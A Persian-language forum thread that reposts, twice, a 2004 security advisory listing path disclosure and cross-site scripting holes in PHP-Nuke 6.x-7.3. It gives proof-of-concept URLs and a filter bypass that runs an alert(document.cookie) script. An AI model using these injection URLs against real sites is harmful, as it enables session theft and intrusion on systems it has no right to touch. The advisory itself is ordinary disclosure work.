عاقبت نوك 7.3 هم مغلوب شد

ghasedak_

Member
سلام
قابل توجه نوكي ها :
[align=left:4770eef4b5]{================================================================================}
{ [waraxe-2004-SA#030] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in PhpNuke 6.x - 7.3 ] }
{ }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 17. May 2004
Location: Estonia, Tartu


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular freeware content management system, written in php by
Francisco Burzi. This CMS (Content Management System) is used on many thousands
websites, because it's freeware, easy to install and has broad set of features.

Homepage: http://phpnuke.org


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

So PhpNuke version 7.3 is out allready and has improved by security means.
Anyway, i have found many unpublished security flaws in it, not fixed yet in 7.3
version and one security hole is brandnew - from integrated nukecops union tap ;)
Time is money, so let's start our journey to PhpNuke's (in)security world...


A. Full path disclosure:

A1 - full path disclosure through unsanitized variable "show" in "WebLinks" module:

http://localhost/nuke73/modules.php?name=Web_Links&l_op=viewlink&cid=1&show=foobar

Warning: Division by zero in D:\apache_wwwroot\nuke73\modules\Web_Links\index.php on line 774



B. Cross-site scripting aka XSS:

B1 - XSS through uninitialized variable "optionbox" in "News" module:

http://localhost/nuke73/modules.php?name=News&file=article&sid=1&optionbox=[xss code here]


B2 - XSS through unsanitized variable "date" in "Statistics" module:

http://localhost/nuke73/modules.php...ailyStats&year=2004&month=5&date=[xss code here]


B3 - XSS through unsanitized variables in "Stories_Archive" module:

http://localhost/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=[xss code here]&month=05&month_l=May
http://localhost/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=[xss code here]&month_l=May
http://localhost/nuke73/modules.php...month&year=2004&month=05&month_l=[xss code here]


B4 - XSS through unsanitized variables in "Surveys" module:

http://localhost/nuke73/modules.php...amp;op=Reply&pid=1&pollID=1&mode=[xss code here]&order=0&thold=0
http://localhost/nuke73/modules.php...pid=1&pollID=1&mode=thread&order=[xss code here]&thold=0
http://localhost/nuke73/modules.php...ollID=1&mode=thread&order=&thold=[xss code here]


B5 - XSS through nukecops UnionTap Sql Prevention Code:

Well, you know, this is my favourite one - securing one hole will induct new one.
Let's look at beginning of the "mainfile.php" from PhpNuke 7.3 :


//Union Tap
//Copyright Zhen-Xjell 2004 http://nukecops.com
//Beta 3 Code to prevent UNION SQL Injections
unset($matches);
unset($loc);
if (preg_match("/([OdWo5NIbpuU4V2iJT0n]{5}) /", rawurldecode($loc=$_SERVER["QUERY_STRING"]), $matches)) {
die("YOU ARE SLAPPED BY <a href=\"http://nukecops.com\">NUKECOPS</a> BY USING '$matches[1]' INSIDE '$loc'.");
}


So this clever code will catch up nonmasked sql injection attempts, made through "GET" request...
Let's try this request:

http://localhost/nuke73/index.php?foo=bar union select

and we see nice message like this:

YOU ARE SLAPPED BY NUKECOPS BY USING 'union' INSIDE 'foo=bar%20union%20select'.

Uh, how scary...
But what, if we issue request like this (try it with M$ Internet Explorer for succes!):

http://localhost/nuke73/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script>

Oops, nice case of cross-site scripting! And because anti-xss filtering code is located
AFTER UnionTap, then we can use even most common "<script>" tags...

Heya to nukecops and have a nice day :)[/align:4770eef4b5]
 
ghasedak_ گفت:
سلام
قابل توجه نوكي ها :
[align=left:395df3bada]{================================================================================}
{ [waraxe-2004-SA#030] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in PhpNuke 6.x - 7.3 ] }
{ }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 17. May 2004
Location: Estonia, Tartu


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular freeware content management system, written in php by
Francisco Burzi. This CMS (Content Management System) is used on many thousands
websites, because it's freeware, easy to install and has broad set of features.

Homepage: http://phpnuke.org


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

So PhpNuke version 7.3 is out allready and has improved by security means.
Anyway, i have found many unpublished security flaws in it, not fixed yet in 7.3
version and one security hole is brandnew - from integrated nukecops union tap ;)
Time is money, so let's start our journey to PhpNuke's (in)security world...


A. Full path disclosure:

A1 - full path disclosure through unsanitized variable "show" in "WebLinks" module:

http://localhost/nuke73/modules.php?name=Web_Links&l_op=viewlink&cid=1&show=foobar

Warning: Division by zero in D:\apache_wwwroot\nuke73\modules\Web_Links\index.php on line 774



B. Cross-site scripting aka XSS:

B1 - XSS through uninitialized variable "optionbox" in "News" module:

http://localhost/nuke73/modules.php?name=News&file=article&sid=1&optionbox=[xss code here]


B2 - XSS through unsanitized variable "date" in "Statistics" module:

http://localhost/nuke73/modules.php...ailyStats&year=2004&month=5&date=[xss code here]


B3 - XSS through unsanitized variables in "Stories_Archive" module:

http://localhost/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=[xss code here]&month=05&month_l=May
http://localhost/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=[xss code here]&month_l=May
http://localhost/nuke73/modules.php...month&year=2004&month=05&month_l=[xss code here]


B4 - XSS through unsanitized variables in "Surveys" module:

http://localhost/nuke73/modules.php...amp;op=Reply&pid=1&pollID=1&mode=[xss code here]&order=0&thold=0
http://localhost/nuke73/modules.php...pid=1&pollID=1&mode=thread&order=[xss code here]&thold=0
http://localhost/nuke73/modules.php...ollID=1&mode=thread&order=&thold=[xss code here]


B5 - XSS through nukecops UnionTap Sql Prevention Code:

Well, you know, this is my favourite one - securing one hole will induct new one.
Let's look at beginning of the "mainfile.php" from PhpNuke 7.3 :


//Union Tap
//Copyright Zhen-Xjell 2004 http://nukecops.com
//Beta 3 Code to prevent UNION SQL Injections
unset($matches);
unset($loc);
if (preg_match("/([OdWo5NIbpuU4V2iJT0n]{5}) /", rawurldecode($loc=$_SERVER["QUERY_STRING"]), $matches)) {
die("YOU ARE SLAPPED BY <a href=\"http://nukecops.com\">NUKECOPS</a> BY USING '$matches[1]' INSIDE '$loc'.");
}


So this clever code will catch up nonmasked sql injection attempts, made through "GET" request...
Let's try this request:

http://localhost/nuke73/index.php?foo=bar union select

and we see nice message like this:

YOU ARE SLAPPED BY NUKECOPS BY USING 'union' INSIDE 'foo=bar%20union%20select'.

Uh, how scary...
But what, if we issue request like this (try it with M$ Internet Explorer for succes!):

http://localhost/nuke73/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script>

Oops, nice case of cross-site scripting! And because anti-xss filtering code is located
AFTER UnionTap, then we can use even most common "<script>" tags...

Heya to nukecops and have a nice day :)[/align:395df3bada]




جناب بس لينكش تو هم ديگه كپي مي كني
 

جدیدترین ارسال ها

بالا